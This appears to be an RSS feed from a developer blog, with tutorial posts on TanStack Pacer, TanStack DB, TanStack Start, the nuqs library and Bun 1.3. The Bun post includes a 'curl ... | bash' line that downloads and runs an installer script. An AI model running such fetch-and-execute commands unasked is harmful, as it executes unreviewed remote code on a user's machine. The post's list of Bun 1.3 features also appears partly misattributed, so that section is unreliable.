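<p>Note how bursts are allowed up to the limit, which is the key difference from throttling's even spacing.</p>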
<pre><code class="lang-typescript">import { rateLimit } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const safeLogin = rateLimit(
  async (email: string, password: string) =&gt; {
    console.log(<span class="hljs-string">"Login attempted"</span>)
    // Backend login API here
    <span class="hljs-built_in">return</span> { success: <span class="hljs-literal">true</span> }
  },
  { <span class="hljs-built_in">limit</span>: 3, interval: 30_000 } // allow 3 attempts every 30s
)

// Usage
safeLogin(<span class="hljs-string">"user@mail.com"</span>, <span class="hljs-string">"pass123"</span>).<span class="hljs-keyword">then</span>(console.log)
safeLogin(<span class="hljs-string">"user@mail.com"</span>, <span class="hljs-string">"pass123"</span>).<span class="hljs-keyword">then</span>(console.log)
// 4th call within 30s will be rate-limited
</code></pre>
<h2 id="heading-queuing">Queuing</h2>
<p>Queuing ensures that every operation is eventually processed, even if they come in faster than they can be handled. Unlike the other execution control techniques that drop excess operations, queuing buffers operations in an ordered list and processes them according to specific rules.</p>
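<p>The essential behavior, buffering everything in order and processing it in controlled chunks rather than dropping work, can be sketched with a tiny FIFO queue (a concept illustration only; Pacer's queuer handles async processing, wait times, and priorities):</p>

```typescript
// Tiny FIFO queue sketch (concept only). Unlike debounce/throttle,
// nothing is dropped: items are buffered in order and processed
// in chunks of at most `chunkSize`.
function createQueue<T>(process: (item: T) => void, chunkSize: number) {
  const buffer: T[] = []
  return {
    enqueue(item: T) {
      buffer.push(item)
    },
    drain(): number {
      // process up to `chunkSize` items, preserving FIFO order
      const batch = buffer.splice(0, chunkSize)
      batch.forEach(process)
      return batch.length
    },
  }
}
```
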
<pre><code class="lang-typescript">import { queue } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const writeToDB = queue(
  async (record: any) =&gt; {
    console.log(<span class="hljs-string">"Writing record:"</span>, record.id)
    await fetch(<span class="hljs-string">"/api/db/save"</span>, {
      method: <span class="hljs-string">"POST"</span>,
      body: JSON.stringify(record),
      headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> }
    })
  },
  { concurrency: 3 } // controlled parallelism
)

// Usage
records.forEach(r =&gt; writeToDB(r))
</code></pre>
<p>Queuing database writes like this avoids lock contention and lets you batch DB operations without hammering the server.</p>
<h2 id="heading-batching">Batching</h2>
<p>Batching collects items over time or until a certain size is reached, then processes them all at once. This is ideal for scenarios where processing items in bulk is more efficient than handling them one by one.</p>
<pre><code class="lang-typescript">import { batch } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const queueMessages = batch(async (msgs: string[]) =&gt; {
  await fetch(<span class="hljs-string">"/api/messages/bulk"</span>, {
    method: <span class="hljs-string">"POST"</span>,
    body: JSON.stringify(msgs),
    headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> }
  })
}, { maxSize: 20, <span class="hljs-built_in">wait</span>: 1500 }) // send when 20 msgs or 1.5s idle

// Usage
queueMessages(<span class="hljs-string">"Hello"</span>)
queueMessages(<span class="hljs-string">"How are you?"</span>)
queueMessages(<span class="hljs-string">"What's new?"</span>)
</code></pre>
<p>Batching messages before sending them to the server reduces network calls by grouping multiple messages into a single request.</p>
<h2 id="heading-final-notes">Final Notes</h2>
<p>Using TanStack Pacer in your application gives you precise control over function execution, leading to smoother UX, reduced API costs, and improved performance. Whether you are handling user input, managing API calls, or orchestrating complex async workflows, these utilities are a one-stop shop for execution timing.</p>
]]></content:encoded></item><item><title><![CDATA[TanStack DB: The Secret to Building Lightning-Fast, Modern Apps]]></title><description><![CDATA[Building fast, modern applications is harder than ever. Your backend might be powerful, your UI might be beautiful—but if the data flowing between them is slow or clunky, your app feels slow.
TanStack DB changes that.
It’s a reactive, client-first da...]]></description><link>https://blog.nidhin.dev/tanstack-db-the-secret-to-building-lightning-fast-modern-apps</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-db-the-secret-to-building-lightning-fast-modern-apps</guid><category><![CDATA[tanstackdb]]></category><category><![CDATA[React]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[JavaScript]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 21 Nov 2025 18:39:01 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763750125395/a917141c-247d-4066-8655-8ff6f6ddb971.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Building fast, modern applications is harder than ever. Your backend might be powerful, your UI might be beautiful—but if the data flowing between them is slow or clunky, your app <em>feels</em> slow.</p>
<p><strong>TanStack DB</strong> changes that.</p>
<p>It’s a reactive, client-first data store that makes your frontend feel instant, smooth, and reliable—no matter how much data your app handles.</p>
<h2 id="heading-why-tanstack-db-exists">Why TanStack DB Exists</h2>
<p>If you’ve built interactive apps before, you’ve probably run into familiar pain points:</p>
<ul>
<li><p>You end up writing <strong>custom API endpoints</strong> for every page</p>
</li>
<li><p>Loading everything upfront makes your app <strong>slow and memory-heavy</strong></p>
</li>
<li><p>State management gets <strong>messy</strong>, especially as your app grows</p>
</li>
</ul>
<p>TanStack DB flips this model and gives you:</p>
<ul>
<li><p><strong>Just-in-time data loading</strong> — fetch only what’s needed, when it’s needed</p>
</li>
<li><p><strong>Fast client-side querying</strong> — almost like having a tiny embedded database</p>
</li>
<li><p><strong>Optimistic updates</strong> — your UI updates instantly, even on slow networks</p>
</li>
</ul>
<p>With TanStack DB, your frontend stays fast and fluid—while your backend handles the heavy lifting behind the scenes.</p>
<h2 id="heading-how-tanstack-db-makes-apps-feel-fast">How TanStack DB Makes Apps Feel Fast</h2>
<p>At its core, TanStack DB combines a local query engine with real-time sync and optimistic updates.</p>
<ul>
<li><p><strong>Blazing-fast queries</strong>: Think sub-millisecond results, even with huge datasets</p>
</li>
<li><p><strong>Real-time updates</strong>: UI changes the moment your data does—users never see stale views</p>
</li>
<li><p><strong>Optimistic mutations</strong>: Edits look instant to the user, while the backend syncs in the background</p>
</li>
</ul>
<p>It plays nicely whether you work with REST APIs, sync engines like ElectricSQL, or other data sources.</p>
<h2 id="heading-the-tanstack-db-approach">The TanStack DB Approach</h2>
<p>Instead of “fetch everything” or “build an endpoint for every UI,” you:</p>
<ul>
<li><p><strong>Define collections</strong>: client-side sets of structured data (like a table in a database).​</p>
</li>
<li><p><strong>Run live queries</strong>: components react immediately as underlying data changes.</p>
</li>
<li><p><strong>Make optimistic updates</strong>: UI updates before the server replies, rolling back if something fails.</p>
</li>
<li><p>Choose sync mode per collection: eager (load up front), on-demand (load as needed), or progressive (hybrid).</p>
</li>
</ul>
<h3 id="heading-key-features">Key Features</h3>
<ul>
<li><p><strong>Live Queries</strong>: Components subscribe to exactly the data they need, instantly re-rendering if anything changes.</p>
</li>
<li><p><strong>Cross-collection Joins</strong>: Easily combine multiple sources, so your UI always shows up-to-date, joined data.</p>
</li>
<li><p><strong>Local-First</strong>: Data lives client-side, so offline and near-instant interactions just work.</p>
</li>
</ul>
<h3 id="heading-example">Example</h3>
<p>Imagine a task app. With TanStack DB, you:</p>
<ul>
<li><p>Define a “todo” collection.</p>
</li>
<li><p>Use a live query to show all incomplete tasks. Any update (even from another tab or device) instantly updates your UI.</p>
</li>
<li><p>Mark a task done? The UI updates now, and the backend call happens behind the scenes</p>
</li>
</ul>
<p>No more manual syncing, no manual state juggling—everything feels alive by default.</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Define collections to load data into</span>
<span class="hljs-keyword">const</span> todoCollection = createCollection({
  <span class="hljs-comment">// ...your config</span>
  <span class="hljs-attr">onUpdate</span>: updateMutationFn,
})

<span class="hljs-keyword">const</span> Todos = <span class="hljs-function">() =&gt;</span> {
  <span class="hljs-comment">// Bind data using live queries</span>
  <span class="hljs-keyword">const</span> { <span class="hljs-attr">data</span>: todos } = useLiveQuery(<span class="hljs-function">(<span class="hljs-params">q</span>) =&gt;</span>
    q.from({ <span class="hljs-attr">todo</span>: todoCollection }).where(<span class="hljs-function">(<span class="hljs-params">{ todo }</span>) =&gt;</span> !todo.completed)
  )

  <span class="hljs-keyword">const</span> complete = <span class="hljs-function">(<span class="hljs-params">todo</span>) =&gt;</span> {
    <span class="hljs-comment">// Instantly applies optimistic state</span>
    todoCollection.update(todo.id, <span class="hljs-function">(<span class="hljs-params">draft</span>) =&gt;</span> {
      draft.completed = <span class="hljs-literal">true</span>
    })
  }

  <span class="hljs-keyword">return</span> (
    <span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">ul</span>&gt;</span>
      {todos.map((todo) =&gt; (
        <span class="hljs-tag">&lt;<span class="hljs-name">li</span> <span class="hljs-attr">key</span>=<span class="hljs-string">{todo.id}</span> <span class="hljs-attr">onClick</span>=<span class="hljs-string">{()</span> =&gt;</span> complete(todo)}&gt;
          {todo.text}
        <span class="hljs-tag">&lt;/<span class="hljs-name">li</span>&gt;</span>
      ))}
    <span class="hljs-tag">&lt;/<span class="hljs-name">ul</span>&gt;</span></span>
  )
}
</code></pre>
<h2 id="heading-using-tanstack-db">Using TanStack DB</h2>
<p>TanStack DB works with:</p>
<ul>
<li><p><strong>REST APIs</strong> (via TanStack Query)</p>
</li>
<li><p><strong>Sync Engines</strong> for real-time, distributed data (ElectricSQL, PowerSync, RxDB, more)</p>
</li>
<li><p><strong>Local Storage</strong> for preferences or offline-only data.</p>
</li>
</ul>
<p>Mix and match as you need—your app doesn’t care where the data comes from.</p>
<h2 id="heading-schema-your-datas-safety-net">Schema: Your Data’s Safety Net</h2>
<p>TanStack DB collections can use schemas (via Zod, Valibot, etc.) for:</p>
<ul>
<li><p>Type safety (auto TypeScript inference)</p>
</li>
<li><p>Runtime validation (catch errors before bad data is stored)</p>
</li>
<li><p>Automatic defaults/transformations</p>
</li>
</ul>
<p>This means robust, trustworthy data structures—just like a real database.</p>
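<p>To make that concrete, here is roughly what a schema does for a collection at runtime. This hand-rolled validator is only a stand-in for a real schema library like Zod or Valibot, which also give you inferred types for free; the Todo shape is a hypothetical example:</p>

```typescript
// Hand-rolled stand-in for a schema (illustration only; in practice you
// would use Zod or Valibot and get TypeScript inference automatically).
interface Todo {
  id: string
  text: string
  completed: boolean
}

// Validates unknown input and applies a default, like a schema's parse().
function parseTodo(input: unknown): Todo {
  const obj = (input ?? {}) as Record<string, unknown>
  const id = obj.id
  const text = obj.text
  if (typeof id !== "string" || typeof text !== "string") {
    throw new Error("Invalid todo: 'id' and 'text' must be strings")
  }
  return {
    id,
    text,
    // automatic default: a missing `completed` becomes false
    completed: typeof obj.completed === "boolean" ? obj.completed : false,
  }
}
```

<p>Bad data is rejected before it ever reaches the store, and defaults are applied consistently, which is exactly the safety net a collection schema provides.</p>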
<h3 id="heading-installation">Installation</h3>
<p>Each supported framework has its own package, which re-exports everything from the core @tanstack/db package.</p>
<pre><code class="lang-bash"><span class="hljs-comment">#React</span>

npm install @tanstack/react-db

<span class="hljs-comment">#Vue</span>

npm install @tanstack/vue-db

<span class="hljs-comment">#Angular</span>

npm install @tanstack/angular-db
</code></pre>
<p>Check out the official docs for setup guides, tutorials, and detailed examples:</p>
<p><a target="_blank" href="http://tanstack.com/db/latest/docs/installation#react"><strong>tanstack.com/db/latest/docs/installation#react</strong></a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack Start]]></title><description><![CDATA[1.What is TanStack Start
TanStack Start is a comprehensive full-stack React framework built on two key technologies:

TanStack Router: TanStack Start relies entirely on TanStack Router for its routing system. The Router is known for being type-safe a...]]></description><link>https://blog.nidhin.dev/tanstack-start</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-start</guid><category><![CDATA[tanstack-start]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Wed, 05 Nov 2025 14:51:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762354242812/1cd59a78-a416-40e4-a02b-0c0c8b9dc585.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-1what-is-tanstack-start">1.What is TanStack Start</h2>
<p>TanStack Start is a comprehensive full-stack React framework built on two key technologies:</p>
<ol>
<li><p>TanStack Router: TanStack Start relies entirely on TanStack Router for its routing system. The Router is known for being type-safe and supporting advanced features like nested routing, search parameters, and data loading.</p>
</li>
<li><p>Vite: Start leverages Vite, a modern build tool that ensures fast development cycles through hot module replacement and optimized production builds. Thanks to its integration with Vite, TanStack Start is ready to be developed and deployed to virtually any hosting provider or runtime you choose</p>
</li>
</ol>
<h2 id="heading-2full-stack-capabilities-beyond-the-router">2.Full-Stack Capabilities (Beyond the Router)</h2>
<p>While the router forms the base (accounting for 90% of the framework), TanStack Start provides a suite of features that enhance the development process by handling both client and server needs</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Features</strong></td><td><strong>Description</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Full-document SSR</td><td>Provides Server-Side Rendering capabilities, which leads to improved performance and SEO</td></tr>
<tr>
<td><strong>Streaming</strong></td><td>Enables progressive page loading, significantly enhancing the user experience</td></tr>
<tr>
<td><strong>Server Functions</strong></td><td>Implements type-safe Remote Procedure Calls (RPCs) to facilitate seamless communication between the client and server</td></tr>
<tr>
<td><strong>Server/API Routes</strong></td><td>Allows developers to define and build backend endpoints directly alongside their frontend code</td></tr>
<tr>
<td><strong>Full-Stack Bundling</strong></td><td>Ensures optimized builds for both the server-side code and the client-side code</td></tr>
<tr>
<td><strong>Middleware &amp; Context</strong></td><td>Provides robust tools for handling request/response flows and injecting contextual data</td></tr>
<tr>
<td><strong>End-to-End Type Safety</strong></td><td>Offers full TypeScript support across the entire technology stack</td></tr>
</tbody>
</table>
</div><p>Developers who know with certainty they do not require any of these full-stack features may opt to use <strong>TanStack Router alone</strong> for powerful, type-safe Single-Page Application (SPA) routing</p>
<h3 id="heading-current-limitations">Current Limitations</h3>
<p>The primary relevant limitation noted in the documentation is that <strong>TanStack Start does not currently support React Server Components (RSC)</strong>. However, the documentation explicitly states that the team is <strong>actively working on integration</strong> and anticipates supporting RSC in the near future</p>
<h2 id="heading-3getting-started">3.Getting started</h2>
<p>The fastest way to get a Start project up and running is with the CLI. Just run</p>
<pre><code class="lang-bash">npm create @tanstack/start@latest
</code></pre>
<p>depending on your package manager of choice. You'll be prompted to add things like Tailwind, ESLint, and a ton of other options. Alternatively, you can clone one of the official examples and run it locally:</p>
<pre><code class="lang-bash">npx gitpick TanStack/router/tree/main/examples/react/start-basic start-basic
<span class="hljs-built_in">cd</span> start-basic
npm install
npm run dev
</code></pre>
<h2 id="heading-4why-developers-love-tanstack-start"><strong>4.Why Developers Love TanStack Start</strong></h2>
<p>Across the community, developers keep coming back to a few recurring themes</p>
<p><strong>Less magic, more control.</strong></p>
<p>Frameworks like Next.js and Remix often rely on “magic” — behaviors that happen automatically behind the scenes. TanStack Start takes the opposite approach. You stay in control of how data loads, where it runs, and what gets rendered. Nothing happens unless you make it happen.</p>
<p><strong>Feels closer to React.</strong></p>
<p>Many developers say that once they start building with TanStack Start, they forget they're even in a framework. It feels like writing plain React — just with smarter tools and a few well-chosen conveniences.</p>
<p><strong>A smoother developer experience.</strong></p>
<p>Type-safe routes, built-in server functions, and predictable data fetching make development and debugging straightforward.</p>
<p><strong>Flexible hosting and tooling.</strong></p>
<p>Thanks to Vite and Nitro under the hood, you can build and deploy anywhere. You’re not tied to a single company’s hosting platform or runtime. It’s your app, your stack, your rules.</p>
<h2 id="heading-end-notes">End Notes</h2>
<p>TanStack Start is still growing, but it is already making an impact. Its community and documentation are growing quickly, and it's backed by a dedicated team.</p>
<p>If you want to give TanStack Start a try, start with the official overview:</p>
<p><a target="_blank" href="https://tanstack.com/start/latest/docs/framework/react/overview">https://tanstack.com/start/latest/docs/framework/react/overview</a></p>
]]></content:encoded></item><item><title><![CDATA[nuqs - Type-safe search params
state manager for React]]></title><description><![CDATA[Are you tired of cumbersome query parameter handling in your React applications? State management that syncs with the URL can often feel complex, but a powerful, tiny library called nuqs aims to change that, making URL management feel like an integra...]]></description><link>https://blog.nidhin.dev/nuqs-type-safe-search-params-state-manager-for-react</link><guid isPermaLink="true">https://blog.nidhin.dev/nuqs-type-safe-search-params-state-manager-for-react</guid><category><![CDATA[nuqs]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[React]]></category><category><![CDATA[react router]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Remix]]></category><category><![CDATA[vite]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Tue, 04 Nov 2025 17:16:09 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762276508074/95086ab9-d7e9-41ba-826e-215e1ac2cea2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Are you tired of cumbersome query parameter handling in your React applications? State management that syncs with the URL can often feel complex, but a powerful, tiny library called nuqs aims to change that, making URL management feel like an integral part of your design conversation.</p>
<p>nuqs is a type-safe search params state manager for React. It provides end-to-end type safety between Server and Client components, simplifying your URL logic "like magic". Best of all, it offers a familiar, simple API that makes lifting state to the URL extremely easy. At only 6 kB gzipped, nuqs is a feature-rich, customizable, and thoroughly tested library.</p>
<h2 id="heading-1simple-state-management-with-usequerystate">1.Simple State Management with useQueryState</h2>
<p>The core strength of nuqs is its simplicity, mimicking the structure of standard React state hooks. If you currently use React.useState to manage local UI state, you can replace it with <strong>useQueryState</strong> to seamlessly sync that state with the URL.</p>
<p>The useQueryState hook requires one argument: the key to use in the query string. Like React.useState, it returns an array containing the value present in the query string (as a string, or null if not found) and a state updater function.</p>
<pre><code class="lang-javascript"><span class="hljs-string">'use client'</span>
<span class="hljs-keyword">import</span> { useQueryState } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span>

<span class="hljs-keyword">export</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Demo</span> (<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> [name, setName] = useQueryState(<span class="hljs-string">'name'</span>)
  <span class="hljs-comment">// ... returns name (string or null) and setName function</span>
}
</code></pre>
<p>A crucial feature is the handling of default values and types. By default, useQueryState returns a string or null. However, using built-in parsers (like parseAsInteger) allows you to define the expected type and provide a default value</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { useQueryState, parseAsInteger } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span>

<span class="hljs-comment">// `count` will be a number, defaulting to 0 if not in the URL</span>
<span class="hljs-keyword">const</span> [count, setCount] = useQueryState(<span class="hljs-string">'count'</span>, parseAsInteger.withDefault(<span class="hljs-number">0</span>))
</code></pre>
<p>Using .withDefault(0) ensures that count will never be null, simplifying state updates (e.g., setCount(c =&gt; c + 1)).</p>
<p>Note that this default value is internal to React and will not be written to the URL unless you set it explicitly. If you wish to remove a key from the query string entirely, simply set the state value to null</p>
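<p>Conceptually, a parser like parseAsInteger boils down to a pair of functions: one to parse the raw query-string value and one to serialize state back into the URL. A rough sketch of that shape (an illustration, not nuqs's actual internals):</p>

```typescript
// Rough sketch of what a nuqs-style parser boils down to (illustration
// only): parse the raw string from the URL, serialize state back out.
const intParser = {
  parse(value: string): number | null {
    const n = parseInt(value, 10)
    return Number.isNaN(n) ? null : n // invalid input yields null
  },
  serialize(value: number): string {
    return String(value)
  },
}
```

<p>This is why an invalid URL value like ?count=banana can fall back to the default: the parse step yields null instead of garbage.</p>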
<h2 id="heading-2universal-compatibility-with-adapters">2.Universal Compatibility with Adapters</h2>
<p>Since version 2, nuqs has embraced universal compatibility across a variety of React frameworks. This is achieved by wrapping your application entry point with the NuqsAdapter context provider.</p>
<p>Supported frameworks include</p>
<ul>
<li><p>Next.js (App router and Pages router)</p>
</li>
<li><p>React SPA (e.g., with Vite)</p>
</li>
<li><p>Remix</p>
</li>
<li><p>React Router v6 and v7</p>
</li>
<li><p>TanStack Router (experimental support)</p>
</li>
</ul>
<p>For instance, when using the Next.js App router, you wrap your components in the root layout file:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// src/app/layout.tsx </span>
<span class="hljs-keyword">import</span> { NuqsAdapter } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs/adapters/next/app'</span>
<span class="hljs-comment">// ...</span>
&lt;NuqsAdapter&gt;{children}&lt;/NuqsAdapter&gt;
</code></pre>
<h3 id="heading-server-side-framework-considerations">Server-Side Framework Considerations</h3>
<p>If you are using a non-JavaScript server (like Django, Rails, or Laravel) and need the web server to be notified when the URL state changes (for server-side rendering other parts of the application), you can enable full-page navigation for updates configured with shallow: false. This option, introduced in version 2.4.0, is set on the adapter:</p>
<pre><code class="lang-javascript">&lt;NuqsAdapter fullPageNavigationOnShallowFalseUpdates&gt;
</code></pre>
<h2 id="heading-3advanced-state-management-and-server-side-features">3.Advanced State Management and Server-Side Features</h2>
<p>While useQueryState is great for single keys, nuqs offers tools for handling multiple states and integrating seamlessly with server components.</p>
<h3 id="heading-managing-multiple-keys-with-usequerystates">Managing Multiple Keys with useQueryStates</h3>
<p>For query keys that should always move together, the useQueryStates hook is available. You pass it an object defining all keys and their parsers:</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { useQueryStates, parseAsFloat } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span> 

<span class="hljs-keyword">const</span> [coordinates, setCoordinates] = useQueryStates({
  <span class="hljs-attr">lat</span>: parseAsFloat.withDefault(<span class="hljs-number">45.18</span>),
  <span class="hljs-attr">lng</span>: parseAsFloat.withDefault(<span class="hljs-number">5.72</span>)
})
</code></pre>
<p>The setCoordinates function allows you to update all (or a subset of) the keys in a single go. All state updates are batched and applied asynchronously to the URL. Furthermore, passing null to the state updater function will clear all keys managed by that useQueryStates hook.</p>
<h3 id="heading-shorter-cleaner-urls">Shorter, Cleaner URLs</h3>
<p>To ensure that your variable names are readable within your codebase (e.g., latitude) while keeping your URLs short (e.g., lat), you can use the urlKeys option within the hook settings:</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">const</span> [{ latitude, longitude }, setCoordinates] = useQueryStates({ <span class="hljs-comment">/* ...parsers */</span> }, {
  <span class="hljs-attr">urlKeys</span>: {
    <span class="hljs-attr">latitude</span>: <span class="hljs-string">'lat'</span>,
    <span class="hljs-attr">longitude</span>: <span class="hljs-string">'lng'</span>
  }
})
<span class="hljs-comment">// This results in URLs like: ?lat=45.18&amp;lng=5.72</span>
</code></pre>
<h3 id="heading-type-safe-server-side-reading-nextjsremix">Type-Safe Server-Side Reading (Next.js/Remix)</h3>
<p>nuqs provides essential tools for accessing search params type-safely on the server.</p>
<p><strong>Loaders.</strong> Introduced in version 2.3.0, loaders allow you to parse search parameters server-side using the createLoader function.</p>
<p>The resulting loader function can parse search params from various sources, including Request objects, full URLs, URLSearchParams objects, or standard key-value records. For example, in a Next.js App Router component, you can consume search parameters asynchronously:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Example Server Component usage:</span>
<span class="hljs-keyword">const</span> { latitude, longitude } = <span class="hljs-keyword">await</span> loadSearchParams(searchParams)
</code></pre>
<p>If you need stricter parsing behavior, you can enable strict mode. By default, if an invalid value is found for a parser (e.g., ?count=banana for an integer), the default value is returned; in strict mode, loadSearchParams will throw an error instead.</p>
<p><strong>Server Cache.</strong> For accessing search parameters in deeply nested React Server Components without prop drilling, you can use createSearchParamsCache. You define your parsers and then call .parse() in the root Server Component. Child Server Components can then access type-safe values using searchParamsCache.get('key').</p>
<h2 id="heading-end-notes">End Notes</h2>
<p>nuqs is a modern, elegant, and powerful solution for managing URL query parameters in the React ecosystem. It provides essential features like type-safe server handling, batching, and universal adapter support, all while retaining a simple useState-like developer experience.</p>
<p>If you are ready to simplify your URL state logic, installation is straightforward:</p>
<pre><code class="lang-bash">npm install nuqs
</code></pre>
]]></content:encoded></item><item><title><![CDATA[Bun 1.3]]></title><description><![CDATA[1.What is Bun?
Before we get to 1.3, let us quickly see what Bun is.
Imagine you have a toolbox for building web applications and running JavaScript outside of a web browser. In that toolbox, you usually have things like Node.js (to run your code), n...]]></description><link>https://blog.nidhin.dev/bun-13</link><guid isPermaLink="true">https://blog.nidhin.dev/bun-13</guid><category><![CDATA[bun1.3]]></category><category><![CDATA[Bun]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Node.js]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 19 Oct 2025 13:46:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760881866003/5dc10a38-e60f-45a4-aa83-449f7057a938.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-1what-is-bun">1.What is Bun?</h2>
<p>Before we get to 1.3, let us quickly see what Bun is.</p>
<p>Imagine you have a toolbox for building web applications and running JavaScript outside of a web browser. In that toolbox, you usually have things like Node.js (to run your code), npm or Yarn (to manage your project's packages/dependencies), and maybe a bundler like Webpack or Vite (to optimize your code for the browser).</p>
<p>Bun's big idea is to be one super-fast tool that does all of that, and more. It's like having a Swiss Army knife that replaces your whole toolbox, and it's built from the ground up to be incredibly speedy. It's written in a low-level language called Zig, which helps it achieve that performance.</p>
<h2 id="heading-2key-features-of-bun">2.Key Features of Bun</h2>
<ol>
<li><p><strong>Runtime</strong>: It can run your JavaScript and TypeScript code, just like Node.js.</p>
</li>
<li><p><strong>Package Manager</strong>: It can install, update, and manage your project's dependencies, similar to npm or Yarn. But it's way faster.</p>
</li>
<li><p><strong>Bundler</strong>: It can package your code for the browser, like Webpack or Vite, but again, super fast and built-in.</p>
</li>
<li><p><strong>Test Runner</strong>: It has its own built-in test runner.</p>
</li>
<li><p><strong>Transpiler</strong>: It understands TypeScript and JSX (React's syntax) out of the box, so no extra setup is needed.</p>
</li>
</ol>
<h2 id="heading-3whats-new-and-exciting-in-bun-13">3.What's New and Exciting in Bun 1.3?</h2>
<p>Bun 1.3 brings a bunch of improvements</p>
<ol>
<li><p><strong>Faster bun install:</strong> This is a big one! If you've ever waited for npm install to finish, you know the pain. Bun's package manager (bun install) was already fast, but 1.3 makes it even faster, especially for projects with lots of dependencies. They've optimized how it fetches and installs packages. This means less waiting and more coding for you!</p>
</li>
<li><p><strong>Windows Compatibility:</strong> (More Stable!) While Bun has been available on Windows for a bit, 1.3 significantly improves its stability and performance on the platform. They've fixed a lot of bugs and made it feel much more native and reliable for Windows users.</p>
</li>
<li><p><strong>New Bun.Glob API:</strong> This is a developer-centric feature that's pretty handy. "Globbing" is a fancy way of describing pattern matching for file paths. For example, if you want to find all .js files in a src folder, you might use a glob pattern like src/**/*.js. Bun.Glob provides a super-fast, built-in way to do this. Before, developers often had to install separate packages to handle globbing. Now it's part of Bun, and it's optimized for speed.</p>
</li>
<li><p><strong>fetch API Improvements</strong>: The fetch API is a standard way to make network requests (like getting data from a server). Bun 1.3 brings significant performance boosts and better compatibility for its fetch implementation. This means your applications that make a lot of network requests will run even quicker and more reliably.</p>
</li>
<li><p><strong>More Node.js Compatibility</strong>: Bun aims to be a drop-in replacement for Node.js. With each release, it gets closer to 100% compatibility. Bun 1.3 continues this trend by improving support for more Node.js APIs and modules. This means fewer headaches when migrating existing Node.js projects to Bun.</p>
</li>
</ol>
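<p>To make the globbing idea above concrete, here is a toy sketch of what a pattern like <code>src/**/*.js</code> expresses. This is plain JavaScript for illustration only, not Bun's native implementation:</p>

```javascript
// Toy illustration of glob matching: converts a simple glob pattern
// into a RegExp. Bun.Glob is a fast native API; this sketch just shows
// the semantics of "**" (any depth) and "*" (within one path segment).
function globToRegExp(glob) {
  const source = glob
    .split(/(\*\*\/|\*\*|\*)/) // split while keeping the wildcard tokens
    .map((part) => {
      if (part === '**/') return '(?:[^/]+/)*'; // any number of directories
      if (part === '**') return '.*';           // anything, across directories
      if (part === '*') return '[^/]*';         // anything within one segment
      return part.replace(/[.+^${}()|[\]\\?]/g, '\\$&'); // escape literal chars
    })
    .join('');
  return new RegExp(`^${source}$`);
}

const jsFiles = globToRegExp('src/**/*.js');
console.log(jsFiles.test('src/app.js'));        // true
console.log(jsFiles.test('src/utils/math.js')); // true
console.log(jsFiles.test('src/styles.css'));    // false
```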
<h2 id="heading-4why-should-developers-care-about-bun-13">4.Why Should Developers Care About Bun 1.3?</h2>
<ul>
<li><p><strong>Speed</strong>: It's the recurring theme. Faster development, faster execution, faster installations.</p>
</li>
<li><p><strong>Simplicity</strong>: One tool to rule them all. Less configuration, less context switching between different tools.</p>
</li>
<li><p><strong>Modernity</strong>: Built for the modern JavaScript ecosystem, with native TypeScript and JSX support.</p>
</li>
<li><p><strong>Growing Ecosystem</strong>: With improved Windows support and Node.js compatibility, Bun's community and adoption are likely to grow even faster.</p>
</li>
</ul>
<h2 id="heading-5getting-started">5.Getting Started</h2>
<p>You can install Bun on your machine using the command below:</p>
<pre><code class="lang-bash">curl -fsSL https://bun.sh/install | bash
</code></pre>
<p>Or, if you have already installed Bun, you can simply upgrade it:</p>
<pre><code class="lang-bash">bun upgrade
</code></pre>
<h2 id="heading-6bun-for-monorepos">6.Bun for Monorepos</h2>
<p>While Bun 1.3 itself didn't introduce new, dedicated features specifically for monorepos in the way that tools like Lerna, Turborepo, or Nx do, it significantly improves the experience of working with monorepos due to its core enhancements.</p>
<h3 id="heading-a-faster-bun-install-is-a-game-changer-for-monorepos">a. Faster bun install is a Game Changer for Monorepos</h3>
<ul>
<li><p><strong>The Problem in Monorepos</strong>: Monorepos often have many package.json files (one per package/workspace) and a large, shared node_modules directory. Running npm install or yarn install in a monorepo can be notoriously slow, especially for clean installs or when adding new dependencies.</p>
</li>
